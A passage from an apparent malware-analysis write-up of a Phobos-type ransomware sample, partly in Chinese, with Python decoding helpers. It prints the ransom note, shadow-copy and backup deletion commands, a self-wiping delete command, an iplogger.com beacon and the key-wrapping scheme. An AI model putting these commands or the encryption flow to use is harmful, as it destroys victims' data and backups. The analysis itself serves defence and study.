20746865206162696c697479206f662072657475726e696e672066696c65732c20796f752063616e2073656e6420746f20757320616e7920322066696c657320776974682053494d504c4520657874656e73696f6e73286a70672c786c732c646f632c206574632e2e2e206e6f7420646174616261736573212920616e64206c6f772073697a6573286d61782031206d62292c2077652077696c6c2064656372797074207468656d20616e642073656e64206261636b20746f20796f752e2054686174206973206f75722067756172616e7465652e0d0a0d0a2e342e0d0a513a20486f7720746f20636f6e74616374207769746820796f753f0d0a413a20596f752063616e20777269746520757320746f206f7572206d61696c626f783a2063686577626163636140636f636b2e6c690d0a4f7220796f752063616e20636f6e746163742075732076696120544f583a20414441364532363333324632363435314534353736383137394337373143413837413746304634453233344441384438383238383846353035343934393235444346323734413345413535350d0a596f7520646f6e2774206b6e6f772061626f757420544f583f20476f20746f2068747470733a2f2f746f782e636861740d0
a0d0a2e352e0d0a513a20486f772077696c6c207468652064656372797074696f6e2070726f636573732070726f63656564206166746572207061796d656e743f0d0a413a204166746572207061796d656e742077652077696c6c2073656e6420746f20796f75206f7572207363616e6e65722d6465636f6465722070726f6772616d20616e642064657461696c656420696e737472756374696f6e7320666f72207573652e205769746820746869732070726f6772616d20796f752077696c6c2062652061626c6520746f206465637279707420616c6c20796f757220656e637279707465642066696c65732e0d0a0d0a2e362e0d0a513a204966204920646f6e92742077616e7420746f20706179206261642070656f706c65206c696b6520796f753f0d0a413a20496620796f752077696c6c206e6f7420636f6f7065726174652077697468206f75722073657276696365202d20666f722075732c2069747320646f6573206e6f74206d61747465722e2042757420796f752077696c6c206c6f736520796f75722074696d6520616e6420646174612c206361757365206f6e6c792077652068617665207468652070726976617465206b65792e20496e207072616374696365202d2074696d65206973206d756368206d6f72652076616c7561626c65207468616e206d6f6e65792e0d0a0d0a0d0a0d0a3a3a3a4245574152453a3a3a0d0a444f4e27542074727920746f206368616e676520656e637279707465642066696c657320627920796f757273656c6621200d0a496620796f752077696c6c2074727920746f2075736520616e7920746869726420706172747920736f66747761726520666f7220726573746f72696e6720796f75722064617461206f7220616e7469766972757320736f6c7574696f6e73202d20706c65617365206d616b652061206261636b757020666f7220616c6c20656e637279707465642066696c6573210d0a416e79206368616e67657320696e20656e637279707465642066696c6573206d617920656e7461696c2064616d616765206f66207468652070726976617465206b657920616e642c20617320726573756c742c20746865206c6f737320616c6c20646174612e0d0a000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Flag:  0x9
Decrypted string: vssadmin delete shadows /all /quiet
wbadmin delete catalog -quiet
wmic shadowcopy delete
exit

Decrypted HEX: 76737361646d696e2064656c65746520736861646f7773202f616c6c202f71756965740a776261646d696e2064656c65746520636174616c6f67202d71756965740a776d696320736861646f77636f70792064656c6574650a657869740a0000
----------------------------------------------------------------------------------------------------
Flag:  0xa
Decrypted string: (binary: a CryptoAPI RSA public key blob beginning with the "RSA1" magic; not printable, see HEX)
Decrypted HEX: 0602000000a400005253413100040000010001001d35622bcfbcfe4fde59eae15c05d7528d0c1ae6755c180904dd745cd1f5a19986fce1e0e9534595e4fb7bdd6d5cc1f2cee684851bfc59529108c433185cf76c800f421aad345aa6a964e8f485acf1d3965c85654b124257e0142269eab809af68692309843ce7cd4fa8bf3124926f0403a7502abbecfa2ba7504e63a958e7bd000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0xc
Decrypted string: (binary, 4 bytes: 6e dc 7a 8e; not printable)
Decrypted HEX: 6edc7a8e00000000000000000000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0xe
Decrypted string: (binary, little-endian DWORD 0x40000)
Decrypted HEX: 0000040000000000000000000000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0xf
Decrypted string: (binary, little-endian DWORD 0x100000)
Decrypted HEX: 0000100000000000000000000000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x10
Decrypted string: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Decrypted HEX: 534f4654574152455c4d6963726f736f66745c57696e646f7773204e545c43757272656e7456657273696f6e0000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x11
Decrypted string: ProductId
Decrypted HEX: 50726f6475637449640000000000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x12
Decrypted string: \\?\
Decrypted HEX: 5c005c003f005c00000000000000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x13
Decrypted string: waiting for network...
Decrypted HEX: 770061006900740069006e006700200066006f00720020006e006500740077006f0072006b002e002e002e000000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x14
Decrypted string: runas
Decrypted HEX: 720075006e006100730000000000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x16
Decrypted string: SystemDrive
Decrypted HEX: 530079007300740065006d004400720069007600650000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x17
Decrypted string: ComSpec
Decrypted HEX: 43006f006d005300700065006300000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x18
Decrypted string: .[%08X].[%s].%s
Decrypted HEX: 2e005b0025003000380058005d002e005b00250073005d002e00250073000000
----------------------------------------------------------------------------------------------------
Flag:  0x19
Decrypted string: X:\ProgramData\microsoft\windows\caches
Decrypted HEX: 58003a005c00500072006f006700720061006d0044006100740061005c006d006900630072006f0073006f00660074005c00770069006e0064006f00770073005c00630061006300680065007300000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x1a
Decrypted string: Kernel32.dll;Wow64DisableWow64FsRedirection;Wow64RevertWow64FsRedirection;Advapi32.dll;CreateProcessWithTokenW;
Decrypted HEX: 4b65726e656c33322e646c6c3b576f77363444697361626c65576f77363446735265646972656374696f6e3b576f773634526576657274576f77363446735265646972656374696f6e3b41647661706933322e646c6c3b43726561746550726f6365737357697468546f6b656e573b0000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x1b
Decrypted string: exe;dll;
Decrypted HEX: 6500780065003b0064006c006c003b0000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x1e
Decrypted string: finished
Decrypted HEX: 66696e6973686564000000000000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x1f
Decrypted string: open
Decrypted HEX: 6f00700065006e00000000000000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x20
Decrypted string: admin
Decrypted HEX: 610064006d0069006e0000000000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x21
Decrypted string: not admin
Decrypted HEX: 6e006f0074002000610064006d0069006e000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x22
Decrypted string: 1. ID: %08X
2. %s

Decrypted HEX: 31002e002000490044003a00200025003000380058000d000a0032002e002000250073000d000a00000000000000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x23
Decrypted string: %s (%08X)%c %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%

Decrypted HEX: 250073002000280025003000380058002900250063002000250049003600340064002e002500300032004900360034006400200067006200200028002500750029002f00250049003600340064002e002500300032004900360034006400200067006200200028002500750029002f0025007500250025000d000a0000000000
----------------------------------------------------------------------------------------------------
Flag:  0x24
Decrypted string: 3. Total: %I64d.%02I64d gb (%u)/%I64d.%02I64d gb (%u)/%u%%

Decrypted HEX: 33002e00200054006f00740061006c003a002000250049003600340064002e002500300032004900360034006400200067006200200028002500750029002f00250049003600340064002e002500300032004900360034006400200067006200200028002500750029002f0025007500250025000d000a000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x25
Decrypted string: X:\Users\All Users\Microsoft\Windows\Caches
Decrypted HEX: 58003a005c00550073006500720073005c0041006c006c002000550073006500720073005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c0043006100630068006500730000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x26
Decrypted string: ntdll.dll;NtQueryObject;NtQuerySystemInformation;RtlGetVersion;Kernel32.dll;GetFinalPathNameByHandleW;QueryFullProcessImageNameW;
Decrypted HEX: 6e74646c6c2e646c6c3b4e7451756572794f626a6563743b4e74517565727953797374656d496e666f726d6174696f6e3b52746c47657456657273696f6e3b4b65726e656c33322e646c6c3b47657446696e616c506174684e616d65427948616e646c65573b517565727946756c6c50726f63657373496d6167654e616d65573b00000000000000000000000000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x27
Decrypted string: chrome;
Decrypted HEX: 6300680072006f006d0065003b00000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x28
Decrypted string: Users\Public;
Decrypted HEX: 550073006500720073005c005000750062006c00690063003b00000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x29
Decrypted string: iplogger.com
Decrypted HEX: 69706c6f676765722e636f6d0000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x2a
Decrypted string: /1JfuR4
Decrypted HEX: 2f314a6675523400000000000000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x2b
Decrypted string: wininet.dll;HttpOpenRequestA;HttpSendRequestA;InternetOpenA;InternetCloseHandle;InternetConnectA;
Decrypted HEX: 77696e696e65742e646c6c3b487474704f70656e52657175657374413b4874747053656e6452657175657374413b496e7465726e65744f70656e413b496e7465726e6574436c6f736548616e646c653b496e7465726e6574436f6e6e656374413b00000000000000000000000000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x2c
Decrypted string: %08X;%I64d.%02I64d
Decrypted HEX: 253038583b25493634642e253032493634640000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x33
Decrypted string: windows;winnt;\system32;\regedit.exe;
Decrypted HEX: 770069006e0064006f00770073003b00770069006e006e0074003b005c00730079007300740065006d00330032003b005c0072006500670065006400690074002e006500780065003b0000000000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x36
Decrypted string: (binary, 4 bytes f3 2e 59 21, i.e. the little-endian DWORD 0x21592EF3 used as the encrypted-file marker)
Decrypted HEX: f32e592100000000000000000000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x37
Decrypted string: (binary, 4 bytes dc 21 40 5d; the fixed value used in the key record)
Decrypted HEX: dc21405d00000000000000000000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x38
Decrypted string: %s /c ping 1.1.1.1 -n 5 & fsutil file setZeroData offset=0 length=131072 "%s" & del /q /f "%s"
Decrypted HEX: 2500730020002f0063002000700069006e006700200031002e0031002e0031002e00310020002d006e0020003500200026002000660073007500740069006c002000660069006c00650020007300650074005a00650072006f00440061007400610020006f00660066007300650074003d00300020006c0065006e006700740068003d0031003300310030003700320020002200250073002200200026002000640065006c0020002f00710020002f0066002000220025007300220000000000
----------------------------------------------------------------------------------------------------
Flag:  0x39
Decrypted string: \Microsoft\Windows\Network Shortcuts
Decrypted HEX: 5c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c004e006500740077006f0072006b002000530068006f00720074006300750074007300000000000000000000000000000000000000000000000000
----------------------------------------------------------------------------------------------------
Flag:  0x3a
Decrypted string: Your files were encrypted!
Please contact us for decryption.
Decrypted HEX: 596f75722066696c6573207765726520656e63727970746564210a506c6561736520636f6e7461637420757320666f722064656372797074696f6e2e00000000
----------------------------------------------------------------------------------------------------
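To make the table above directly usable, here is an added helper (not the post's own tooling) that decodes a HEX dump from the table into a Python value: UTF-16LE text, ANSI text, or a little-endian DWORD for the 4-byte constants. The detection is heuristic and based only on the bytes; the SAMPLES dictionary is copied from the flag 0x12, 0xe, 0x9 and 0x36 rows above.

```python
import struct

# Added example (not the post's own tooling): decode the entries of the
# string table above from their HEX dumps. Each dump is a fixed-size buffer
# padded with NULs; entries are UTF-16LE text, ANSI text, or a raw 4-byte
# value. The three cases are detected from the bytes themselves.
# SAMPLES is copied from the flag 0x12, 0xe, 0x9 and 0x36 rows shown above.
SAMPLES = {
    0x12: "5c005c003f005c00" + "00" * 24,
    0x0E: "00000400" + "00" * 28,
    0x09: "76737361646d696e2064656c65746520736861646f7773202f616c6c202f71756965740a"
          "776261646d696e2064656c65746520636174616c6f67202d71756965740a"
          "776d696320736861646f77636f70792064656c6574650a657869740a0000",
    0x36: "f32e5921" + "00" * 28,
}


def _printable(bs: bytes) -> bool:
    return all(32 <= b < 127 or b in (9, 10, 13) for b in bs)


def decode_entry(hex_dump: str):
    """str for text entries, int (little-endian DWORD) for 4-byte values, hex text otherwise."""
    raw = bytes.fromhex("".join(hex_dump.split()))
    payload = raw.rstrip(b"\x00")           # trailing NULs are buffer padding
    if not payload:
        return ""
    # UTF-16LE: the high byte of every code unit is 0 for ASCII text; the high
    # byte of the last unit was stripped with the padding, so pad back to even
    wide = payload + b"\x00" * (len(payload) % 2)
    if all(b == 0 for b in wide[1::2]) and _printable(wide[0::2]):
        return wide.decode("utf-16-le")
    if _printable(payload):                  # ANSI command strings, host names, format strings
        return payload.decode("ascii")
    if len(payload) <= 4:                    # DWORD constants: 0x40000, 0x100000, the file marker
        return struct.unpack("<I", payload.ljust(4, b"\x00"))[0]
    return raw.hex()                         # opaque blobs such as the RSA public key


def decode_samples() -> dict:
    """Decode every entry in SAMPLES, keyed by its flag."""
    return {flag: decode_entry(h) for flag, h in SAMPLES.items()}


if __name__ == "__main__":
    for flag, value in decode_samples().items():
        print("0x%02x -> %r" % (flag, value))
```

Running it shows why the two DWORD entries matter later: flag 0xe is 0x40000 (the chunk size and the large-file threshold used in 4.1.12) and flag 0x36 is 0x21592EF3, the marker check_file_last looks for at the end of a file.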

4.1.5 Configuration initialisation (sub_4068B0)

Here sub_402680 is called first, then sub_407B10, which obtains the system directory, the path of the running executable and a few special system folders.

Inside sub_402680 the main work is a call to CryptAcquireContextW that initialises the crypto provider. The provider type is the same one used by the string-decryption routine, PROV_RSA_AES (0x18), as shown below:

Next, the encrypted string data at address 0x41f000 is stored at offset a1+8 of the structure, and the data decrypted under flag 0xa is stored at a1+36 (the data decrypted under flag 0xa here is the ciphertext used by all later string decryptions, and is distinct from the a used later). In short, this function initialises the string-decryption structure.

Once string decryption is initialised, sub_407B10 is called to initialise the remaining configuration variables.

First, GetSystemWindowsDirectoryW obtains the C:\Windows path.

GetModuleFileNameW obtains the path of the executable itself.

SHGetSpecialFolderPathW obtains C:\ProgramData and C:\Users\Admin\Desktop.

After collecting these values, the required strings are decrypted and the global variables initialised.

Finally the decrypted string below is split on semicolons and the listed modules and exports are resolved:

Kernel32.dll;Wow64DisableWow64FsRedirection;Wow64RevertWow64FsRedirection;Advapi32.dll;CreateProcessWithTokenW;

4.1.6 Initialising the dialog contents (sub_406D70)

Before the analysis, the IDs of the GUI controls are worked out so that later descriptions can refer to them as ID plus control type.

Because this is a plain Win32 GUI program, DialogBoxParamW can be located directly and its DialogFunc callback analysed.

In DialogFunc, a2 is the message type; the handlers cover dialog initialisation, button clicks, window close and so on.

Starting with a2 == 0x110, i.e. WM_INITDIALOG: the handler builds the ID and privilege text for edit control 1005 and sets it. The ID is produced by get_ID (sub_408370).

In sub_408370 the required strings are decrypted first, then the value SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId is read into Data.

get_C_Volume_ID (sub_407C90) is called to obtain the volume serial number of the C: drive.

In get_C_Volume_ID the string SystemDrive is decrypted, the environment variable SystemDrive is read (C:), and GetVolumeInformationW returns the volume serial number of that drive.

The serial number is formatted as "-%08x" and appended to the ProductId, the CRC32 of the whole string is computed and returned. That CRC32 is the victim ID.

A short script confirms the value matches (the original post used Python 2 print syntax; updated to Python 3):

import binascii

# ProductId, '-', then the volume serial as 8 hex digits, exactly as the sample concatenates them
cipher1 = '00331-10000-00001-AA161-F8A08166'
print(hex(binascii.crc32(cipher1.encode()) & 0xffffffff))

Since the CRC32 runs over the ASCII text, the case of the hex digits must match the format string used by the binary exactly; a lowercase serial gives a different ID.

Once the ID is computed, the edit-box text is formatted by format_ID_admin (sub_403660).

format_ID_admin checks the return value of the earlier privilege check: if the process runs as administrator v1 is set to "admin", otherwise to "not admin". Together with the generated ID it is formatted into the string "1. ID: %08X\r\n2. %s" to produce the final text.

The formatted text is then passed to the edit control for display.

The values of byte_41A00E, byte_40A00D and byte_41A00F are used to set the state of checkboxes 1012, 1013 and 1015: 1 means checked, anything else unchecked.

The OS version is obtained and checked; if it is below Windows Vista, ShowWindow is called.

The system hotkey CTRL+ALT+V is registered to hide and show the window.

The computer name is obtained and displayed in edit control 1011.

At this point the initialisation of the dialog is complete.

4.1.7 Performing encryption (sub_406D70)

Execution flow chart:

Analysis:

Running the program shows that pressing the Start button triggers encryption and the related operations; this part is also implemented in the DialogFunc callback.

When a2 equals 0x111 (WM_COMMAND), a3 carries the control ID and a switch dispatches the individual control events. Looking up the Start button, ID 1001, gives the following.

After Start is pressed, the length of the text in edit control 1014 is read. If it is 0, no encryption path was specified and a thread is created that calls sub_405690; otherwise the text is passed as a parameter to sub_405580.

Entering sub_405690 first: it is essentially an initialisation function. It calls sub_4033c0 to decrypt the required strings and initialise the corresponding structures, then selects which part to execute depending on the argument; here the argument is 2, so the body of the first branch is skipped.

After that check, sub_4076b0 determines the OS version; if it is newer than Windows Vista / Windows Server 2008 (compared by version number) the encryption flow starts.

Inside start_enc, sub_4012C0 is called first to enumerate the system drives and fill their information into a structure. produce_random_key then generates two keys, and finally sub_4015D0 concatenates the generated key with the fixed value, ID, volume serial number and so on and RSA-encrypts the result (see the key self-encryption section); the encrypted data is 128 bytes.

After key generation and encryption, sub_404BC0 enables UAC virtualisation, exec_del_shadow executes the shadow-copy deletion commands, and close_server terminates the listed processes; these are described in their own sections below.

Finally, after all of the above, the file encryption itself begins: sub_401820 is called to encrypt the current directory.

In sub_401820, sub_401720 first validates the a1 argument; if validation fails the function returns without doing anything further.

Inside sub_401720, the first part is mostly assignments.

Then comes the comparison: the first 8 characters of the current path are compared with the path stored in the path_obj; if they differ 0 is returned, otherwise the full path is returned.

Because in this run the path did not belong to any of the A-Z drives, that check failed and execution continued downward into sub_4019C0, which walks the paths stored in path_obj.

In sub_4019C0, path_obj is first checked for being empty.

If it is not empty, the rest is the same as sub_401820; the only difference is the preceding check: one validates that the path is on a local drive, the other walks the local drives directly.

Next the required strings are decrypted: 0xE (the little-endian DWORD 0x40000, the chunk size and large-file threshold), 0xF (0x100000) and the contact e-mail chewbacca@cock.li. (The original post lists the e-mail under flag 0x9, but in the string table above flag 0x9 is the shadow-copy deletion command list, so the e-mail string comes from a different index.)

The encryption parameters are then written into the argument structure and the encrypted-file suffix is assembled, using the format

.[%08X].[%s].%s, whose three parameters are the ID, the ransom e-mail and the extension, for example:

.[F2479DE1].[chewbacca@cock.li].SRC
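The two pieces above (ID derivation in 4.1.6 and the suffix format here) are what an incident responder needs most often: given a pile of renamed files, recover the victim ID and contact address. The following is an added example, not code from the sample or from the post. It assumes the standard (zlib) CRC32 polynomial that the post's own check uses, and it exposes the hex-digit case of the volume serial as a parameter because the CRC is computed over the ASCII text.

```python
import re
import zlib

# Added example (not the sample's or the post's code): reproduce the victim-ID
# derivation (ProductId + "-" + volume serial -> CRC32) and the ".[%08X].[%s].%s"
# suffix, and parse that suffix back out of an encrypted file name for triage.


def victim_id(product_id: str, volume_serial: int, upper_hex: bool = True) -> int:
    """CRC32 over '<ProductId>-<volume serial as 8 hex digits>'.

    The CRC runs over ASCII text, so the digit case has to match the format
    string the binary really uses; upper_hex mirrors the post's example.
    """
    serial = "%08X" % volume_serial if upper_hex else "%08x" % volume_serial
    return zlib.crc32(("%s-%s" % (product_id, serial)).encode("ascii")) & 0xFFFFFFFF


SUFFIX_FORMAT = ".[%08X].[%s].%s"      # decrypted format string, flag 0x18


def make_suffix(vid: int, email: str, ext: str) -> str:
    """Build the suffix appended to every encrypted file."""
    return SUFFIX_FORMAT % (vid, email, ext)


# The ID is %08X (always 8 upper-case hex digits); the contact part may contain
# anything except ']' so that other Phobos contact addresses match as well.
_SUFFIX_RE = re.compile(r"\.\[(?P<id>[0-9A-F]{8})\]\.\[(?P<email>[^\]]+)\]\.(?P<ext>[^.\\/]+)$")


def parse_encrypted_name(name: str):
    """Return (original name, victim id, contact, extension), or None if the name carries no suffix."""
    m = _SUFFIX_RE.search(name)
    if not m:
        return None
    return name[:m.start()], int(m.group("id"), 16), m.group("email"), m.group("ext")


if __name__ == "__main__":
    # the ProductId and volume serial from the post's own check
    vid = victim_id("00331-10000-00001-AA161", 0xF8A08166)
    print("victim id: %08X" % vid)
    encrypted = "report.docx" + make_suffix(vid, "chewbacca@cock.li", "SRC")
    print(encrypted, "->", parse_encrypted_name(encrypted))
```

parse_encrypted_name anchors on the end of the name, so a document whose original name itself contains brackets or dots is still split correctly; a file that was not renamed returns None instead of a partial match.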


一切初始化完毕后,直接创建线程,调用StartAddress函数来实现对路径的遍历、过滤和加密等操作。


这里进入到StartAddress函数,可以看到具体实现,主要的加密实现在sub_402210函数中。


继续进入到sub_402210函数看一下实现。这里前面有一个sub_402030的部分没有说,因为该函数主要是个路径过滤函数,进入到sub_402210函数中还会再调用一次,所以就不再重复分析了。


进入到sub_402030函数可以看到具体的过滤实现,主要过滤了这几个关键词:

windows
winnt


之后就是下面的return的判断,主要过滤了以下关键词:

C:\Windows
C:\ProgramData\microsoft\windows\caches
C:\Users\All Users\Microsoft\Windows\Caches
Users\Public
C:\\ProgramData
C:\\Users

完成了过滤后,就要开始遍历该路径下的文件夹和文件了,主要通过FindFirstFileW函数加通配符的方式实现该路径下所有文件的遍历


开始校验,开始主要对文件名称做了简单校验,判断其开头是否为...的情况,并且文件名不得为空。


之后就会开始调用check_filename函数,来实现文件名和文件后缀的校验。进入到check_filename函数可以看到具体实现,首先就是获取文件后缀


校验文件的类型,判断是否是系统文件

开始比较,如果遇到exedllSRC为文件后缀,则不加密,如果文件名为以下内容也不加密。

过滤文件名:

boot.ini
bootfont.bin
ntldr
ntdetect.com
io.sys
+README-WARNING+.txt
desktop.ini


在文件过滤完毕后,会判断文件大小是否小于等于0x4000字节大小,如果小于等于就将flag3[2]的值设置为1

反之为0


接着会判断文件的属性是否为只读,如果文件属性是只读就将结构中flag3[3]位置的值设置为1


最后就要开始进行文件的加密操作,可以看到文件加密由encfile(sub_403C100)函数实现

进入到enc_file函数可以看到具体实现,首先会对标志进行校验,然后将文件名给到v4,之后就是针对文件的只读属性进行处理,如果是待加密文件是只读文件,那么就将其权限修改为可读可写。


打开文件的IO流


调用check_file_last函数来检查一下文件末尾的标志是否存在,以判断是否是个正常的文件。


进入到check_file_last函数可以看到具体实现,主要检查末尾四字节的内容是否是21592EF3(HEX),如果代表文件是加密的文件,就不需要进行加密,直接跳过。


如果末尾4字节的标志不是21592EF3,那么就要进行加密。首先会根据文件的大小进行判断,如果大于0x40000字节的文件选择sub_4044E0函数进行加密,小于等于0x40000字节的文件选择sub_403EE0函数进行加密。这里的加密的详细,在文件加密板块来仔细分析。


加密完成后,将对文件的名称进行修改,拼接上勒索后缀。


最后调用MoveFileW函数实现文件名称的修改


如果文件是只读文件,加密完毕后,会将文件属性再修改回去。


全部的文件加密完成后,v35会进行自增,代表加密文件数量+1,然后开始读取该目录下的其他文件。


当所有的文件读取完毕后,将进行勒索信的写入


勒索信的写入主要实现函数为sub_408BC0函数,在写入完毕后就会关闭文件流。这里的勒索信的写入函数在勒索信写入部分会做详细分析。

到此,大部分的加密流程就分析完毕。

4.1.8 Drive enumeration (sub_4012C0)

SetErrorMode is called to change the error mode so that the system does not display error dialogs.

The physical drives are obtained, along with the ID value.

The letters A-Z are iterated and every drive that exists is inserted as a structure into the a1 object. A drive counts as present if its volume serial number can be retrieved; otherwise the next letter is tried.

Defining a structure for this data makes it easier to read.

path_obj:

struct path_obj
{
  WCHAR path;
  __declspec(align(16)) _DWORD unknown_fields;
  _DWORD VolumeSerialNumber;
  _DWORD ID;
  _DWORD DriveType;
};

After enumeration, the a1 object is visible in memory as the number of drives and a pointer to the path_obj entries.

The two path_obj entries the pointer refers to:

The corresponding path_obj:

This completes the enumeration of the system drives.

4.1.9 Key generation (produce_random_key)

The call site is covered in the encryption section; this part covers the implementation. It is easiest to follow with the structure built during drive enumeration.

Inside the function, the drive structures (path_obj) stored during enumeration are looped over. CryptAcquireContextW initialises a crypto object of the same provider type used for string encryption and decryption, and CryptGenRandom generates 32 random bytes that are used as the encryption key.

Two keys are generated this way, by the same method.

They are stored at offsets 32 and 40 of the corresponding drive structure.

The path_obj structure can now be extended:

struct struct_v8
{
  WCHAR path;
  __declspec(align(16)) _DWORD unknown_fields;
  _DWORD VolumeSerialNumber;
  _DWORD ID;
  _DWORD DriveType;
  _DWORD first_produce_key;
  _DWORD first_produce_key_encdata;
  _DWORD second_produce_key;
  _DWORD second_produce_key_encdata;
};

So each drive object path_obj has two distinct keys.

4.1.10 Key self-encryption (sub_4015D0)

First the string with flag 0x37, dc21405d (hex), is decrypted; it is a fixed value.

Then every path_obj is walked and its fields are extracted and concatenated in the format:

fixed value + ID + VolumeSerialNumber + DriveType + Key

The CRC32 of that is computed and appended to the end, giving the complete record:

fixed value + ID + VolumeSerialNumber + DriveType + Key + CRC32

Finally RSA_encode performs the RSA encryption, producing a 128-byte ciphertext.

The RSA output is stored in the first_produce_key_encdata and second_produce_key_encdata fields of the path_obj.

4.1.11 RSA encryption (sub_402750)

The RSA encryption is straightforward, as RSA_encode shows: CryptAcquireContextW initialises a crypto object, CryptImportKey imports the public key, and CryptEncrypt performs the encryption. The algorithm is identified the same way as before: the key blob structure clearly shows an RSA key. The blob is a CryptoAPI PUBLICKEYBLOB (bType 0x06, aiKeyAlg CALG_RSA_KEYX 0xa400, magic "RSA1"), its bit length field is 0x400 = 1024 and its public exponent 0x10001; CryptEncrypt with an RSA key applies PKCS#1 v1.5 padding, which is why each encrypted key record is exactly 128 bytes.

The RSA public key is the data decrypted under flag 0xa:

0602000000a400005253413100040000010001001d35622bcfbcfe4fde59eae15c05d7528d0c1ae6755c180904dd745cd1f5a19986fce1e0e9534595e4fb7bdd6d5cc1f2cee684851bfc59529108c433185cf76c800f421aad345aa6a964e8f485acf1d3965c85654b124257e0142269eab809af68692309843ce7cd4fa8bf3124926f0403a7502abbecfa2ba7504e63a958e7bd000000000000000000000000
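To tie 4.1.10 and 4.1.11 together, here is an added example (not code from the sample or the post) that parses the PUBLICKEYBLOB above, builds a per-drive key record in the order the post describes, and RSA-encrypts it the way CryptEncrypt does with an RSA key: RSAES-PKCS1-v1_5, with the ciphertext stored little-endian. The field widths and byte order of the record (little-endian DWORDs, the raw 32-byte key) and the values used in main() are assumptions for illustration; the page gives the field order only.

```python
import os
import struct
import zlib

# Added example, not code from the sample or the post. Parses the CryptoAPI
# PUBLICKEYBLOB recovered under flag 0xa, builds the key record of 4.1.10 and
# encrypts it as CryptEncrypt does for RSA keys (PKCS#1 v1.5, little-endian
# output). Record layout (LE DWORDs, raw 32-byte key) is an assumption.

PUBLIC_KEY_BLOB_HEX = (
    "0602000000a40000525341310004000001000100"
    "1d35622bcfbcfe4fde59eae15c05d7528d0c1ae6755c180904dd745cd1f5a199"
    "86fce1e0e9534595e4fb7bdd6d5cc1f2cee684851bfc59529108c433185cf76c"
    "800f421aad345aa6a964e8f485acf1d3965c85654b124257e0142269eab809af"
    "68692309843ce7cd4fa8bf3124926f0403a7502abbecfa2ba7504e63a958e7bd"
)
FIXED_VALUE = bytes.fromhex("dc21405d")   # flag 0x37, in the byte order shown on the page

PUBLICKEYBLOB = 0x06
CALG_RSA_KEYX = 0x0000A400
RSA1_MAGIC = 0x31415352                   # "RSA1" read as a little-endian DWORD


def parse_publickeyblob(blob: bytes):
    """Return (modulus, public exponent, bit length) from a CryptoAPI PUBLICKEYBLOB."""
    btype, _version, _reserved, alg = struct.unpack_from("<BBHI", blob, 0)   # BLOBHEADER
    magic, bitlen, pubexp = struct.unpack_from("<III", blob, 8)              # RSAPUBKEY
    if btype != PUBLICKEYBLOB or alg != CALG_RSA_KEYX or magic != RSA1_MAGIC:
        raise ValueError("not an RSA PUBLICKEYBLOB")
    nbytes = bitlen // 8
    modulus = int.from_bytes(blob[20:20 + nbytes], "little")   # CryptoAPI stores n little-endian
    return modulus, pubexp, bitlen


def build_key_record(fixed: bytes, victim_id: int, volume_serial: int, drive_type: int, key: bytes) -> bytes:
    """fixed + ID + VolumeSerialNumber + DriveType + Key, then the CRC32 of all of it (4.1.10)."""
    if len(fixed) != 4 or len(key) != 32:
        raise ValueError("fixed value is 4 bytes, AES-256 key is 32 bytes")
    body = fixed + struct.pack("<III", victim_id, volume_serial, drive_type) + key
    return body + struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)


def verify_key_record(record: bytes) -> bool:
    """True if the trailing CRC32 matches the 48 bytes before it."""
    if len(record) != 52:
        return False
    return struct.unpack("<I", record[-4:])[0] == (zlib.crc32(record[:-4]) & 0xFFFFFFFF)


def rsa_pkcs1v15_encrypt(modulus: int, exponent: int, message: bytes, rng=os.urandom) -> bytes:
    """RSAES-PKCS1-v1_5; the ciphertext is returned little-endian, as CryptEncrypt writes it."""
    k = (modulus.bit_length() + 7) // 8
    if len(message) > k - 11:
        raise ValueError("message too long for PKCS#1 v1.5 with this key")
    ps = b""
    while len(ps) < k - len(message) - 3:
        ps += bytes(b for b in rng(k) if b != 0)      # padding string must contain no zero bytes
    em = b"\x00\x02" + ps[: k - len(message) - 3] + b"\x00" + message
    c = pow(int.from_bytes(em, "big"), exponent, modulus)
    return c.to_bytes(k, "little")


def encrypt_key_record(record: bytes, blob: bytes = bytes.fromhex(PUBLIC_KEY_BLOB_HEX), rng=os.urandom) -> bytes:
    n, e, _bits = parse_publickeyblob(blob)
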